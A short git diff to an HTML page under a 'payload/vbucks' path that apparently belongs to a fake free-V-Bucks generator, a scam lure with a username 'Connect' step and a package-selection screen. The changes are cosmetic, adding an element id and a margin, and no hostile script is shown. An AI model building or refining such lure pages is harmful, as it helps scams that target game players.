hide post login

--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -47,13 +47,13 @@
                            <a href="index.html#" id="connect"><span> Connect </span></a>
                         </div>
                      </div>
-                     <div class="username-connected text-center" style="display: none;">
+                     <div class="username-connected text-center" id="post_login" style="display: none;">
                         <p>Your Username<span id="user-text"></span> is</p>
                         <p class="conn">Connected</p>
                      </div>
                      <div class="select-vbucks col-lg-12" style="display: none;" id="select_screen">
                         <div class="col-sm-12 col-xs-12 center-block select-vbucks-wrap">
-                           <p style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Select a V-Bucks Package</p>
+                           <p style="font-family: fortnite; font-size: 25px; text-transform: uppercase; margin-top: 0px;">Select a V-Bucks Package</p>
                            <ul>
                               <li class="active " role="presentation">
                                  <a href="index.html#tools"  aria-controls="tools" role="tab" data-toggle="tab">
